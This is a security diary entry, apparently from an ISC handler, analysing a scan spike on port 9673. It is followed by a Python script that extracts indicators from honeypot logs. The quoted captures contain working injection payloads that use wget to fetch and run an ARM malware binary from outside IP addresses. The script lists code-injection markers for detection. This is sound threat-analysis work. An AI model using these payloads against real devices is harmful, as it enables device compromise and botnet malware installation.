I don't know how many of you pay attention to the Top 10 Ports graphs on your isc.sans.edu dashboard, but I do. Unfortunately, the top 10 is pretty constant: the botnets keep attacking the same ports. What I find more interesting is anomalous behavior, changes from what is normal on a given port. So, a little over a week ago, I saw a jump on a port I wasn't familiar with, 9673/TCP. Looking at the longer term, we've seen the occasional spike on it, but this is the first one where the number of sources was up significantly, too.
Here are two of the requests captured on that port:

20200429-051959: 0.0.0.0:9673-197.60.52.212:59732 data b"GET /live/CPEManager/AXCampaignManager/delete_cpes_by_ids HTTP/1.1\r\nUser-Agent: XTC\r\nHost: 127.0.0.1:9673\r\nContent-Length: 1000\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\n\r\ncpe_ids=__import__('os').system('wget http://212.114.52.128/arm7 -O /tmp/viktor; chmod 777 /tmp/viktor; /tmp/viktor')\r\n\r\n"

20200430-082737: 0.0.0.0:9673-14.177.232.245:51026 data b"GET /live/CPEManager/AXCampaignManager/delete_cpes_by_ids HTTP/1.1\r\nUser-Agent: XTC\r\nHost: 127.0.0.1:9673\r\nContent-Length: 1000\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\n\r\ncpe_ids=__import__('os').system('wget http://178.33.64.107/arm7 -O /tmp/upnp.debug; chmod 777 /tmp/upnp.debug; /tmp/upnp.debug')\r\n\r\n"

Both requests hit the same delete_cpes_by_ids endpoint and stuff a Python expression into the cpe_ids parameter, which only makes sense if the target evaluates that parameter as code. The injected command fetches an ARM binary (arm7), makes it executable and runs it from /tmp, which is the usual dropper pattern for IoT malware. Note also the body on a GET request and the fixed Content-Length of 1000 that doesn't match the actual body; both are handy fingerprints for this scanner.

As we always say, your IoT devices should not generally be directly exposed to the internet. I know people are fond of saying the perimeter is dead, but seriously, you should still have a firewall that blocks inbound traffic to (at least) your IoT devices.
Jim, ISC Handler, May 1st 2020
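The following is an added example, not code from the diary or from any vendor. It turns capture lines of the shape shown above into structured indicators (source IP, request path, user agent, the injected parameter, the URL the payload downloads from and the path it drops to), which is what you would feed into a blocklist or a detection rule. The two sample lines are the diary's own captures, reproduced here as constructed input. The `safe_parse_cpe_ids` function is a hypothetical hardened form of the parameter handling: it assumes, as the payload implies but the diary does not confirm, that the targeted software evaluates `cpe_ids` as Python, and shows the only acceptable alternative, parsing it as a list of integers. Field names and the `content_length_mismatch` flag are my own choices.

```python
import ast
import re
from urllib.parse import unquote_plus

# Constructed sample input: the two captures quoted in the diary, in the honeypot's own
# log shape (timestamp, local:port-remote:port, then repr() of the raw request bytes).
SAMPLE_CAPTURES = [
    r'''20200429-051959: 0.0.0.0:9673-197.60.52.212:59732 data b"GET /live/CPEManager/AXCampaignManager/delete_cpes_by_ids HTTP/1.1\r\nUser-Agent: XTC\r\nHost: 127.0.0.1:9673\r\nContent-Length: 1000\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\n\r\ncpe_ids=__import__('os').system('wget http://212.114.52.128/arm7 -O /tmp/viktor; chmod 777 /tmp/viktor; /tmp/viktor')\r\n\r\n"''',
    r'''20200430-082737: 0.0.0.0:9673-14.177.232.245:51026 data b"GET /live/CPEManager/AXCampaignManager/delete_cpes_by_ids HTTP/1.1\r\nUser-Agent: XTC\r\nHost: 127.0.0.1:9673\r\nContent-Length: 1000\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\n\r\ncpe_ids=__import__('os').system('wget http://178.33.64.107/arm7 -O /tmp/upnp.debug; chmod 777 /tmp/upnp.debug; /tmp/upnp.debug')\r\n\r\n"''',
]

CAPTURE_RE = re.compile(
    r'^(?P<ts>\d{8}-\d{6}): (?P<lip>[\d.]+):(?P<lport>\d+)-(?P<rip>[\d.]+):(?P<rport>\d+) data (?P<data>b".*")$'
)
URL_RE = re.compile(r"https?://[^\s'\";]+")      # download locations inside the payload
DROP_RE = re.compile(r"-O\s+([^\s;]+)")          # wget -O <path>: where the binary lands
INJECTION_MARKERS = ("__import__", "os.system", "subprocess", "eval(", "exec(")


def parse_capture(line):
    """Parse one honeypot capture line into a dict of indicators (hypothetical field names)."""
    m = CAPTURE_RE.match(line)
    if not m:
        raise ValueError("not a capture line")
    # The honeypot logged repr() of the bytes; literal_eval restores them without executing anything.
    raw = ast.literal_eval(m.group("data"))
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    # Not parse_qs: Python <= 3.9 also splits on ';', which appears inside the injected command.
    param, _, value = body.decode("latin-1").strip().partition("=")
    value = unquote_plus(value)
    drop = DROP_RE.search(value)
    return {
        "timestamp": m.group("ts"),
        "src_ip": m.group("rip"),
        "src_port": int(m.group("rport")),
        "dst_port": int(m.group("lport")),
        "method": method,
        "path": path,
        "user_agent": headers.get("user-agent", ""),
        # A body on a GET plus a Content-Length that does not match it is a scanner fingerprint.
        "content_length_mismatch": headers.get("content-length") != str(len(body)),
        "param": param,
        "payload": value,
        "is_code_injection": any(k in value for k in INJECTION_MARKERS),
        "download_urls": URL_RE.findall(value),
        "drop_path": drop.group(1) if drop else None,
    }


def extract_indicators(lines):
    """Run the parser over a batch of capture lines and collect the distinct indicators."""
    records = [parse_capture(l) for l in lines]
    return {
        "sources": sorted({r["src_ip"] for r in records}),
        "download_urls": sorted({u for r in records for u in r["download_urls"]}),
        "drop_paths": sorted({r["drop_path"] for r in records if r["drop_path"]}),
        "paths": sorted({r["path"] for r in records}),
    }


def safe_parse_cpe_ids(value):
    """Hypothetical hardened handling of the probed parameter (assumes the target currently
    evaluates cpe_ids as Python): accept a comma-separated list of integers, reject anything else."""
    ids = []
    for item in value.split(","):
        item = item.strip()
        if not item.isdigit():
            raise ValueError(f"rejected cpe_id {item!r}")
        ids.append(int(item))
    return ids


if __name__ == "__main__":
    for rec in (parse_capture(l) for l in SAMPLE_CAPTURES):
        print(rec["timestamp"], rec["src_ip"], rec["user_agent"], rec["download_urls"], rec["drop_path"])
    print(extract_indicators(SAMPLE_CAPTURES))
```

Point it at a whole day of honeypot output and the `download_urls` and `drop_paths` sets are what change between campaigns while `path`, `user_agent` and the Content-Length mismatch stay constant, which is why the latter make the better detection signature.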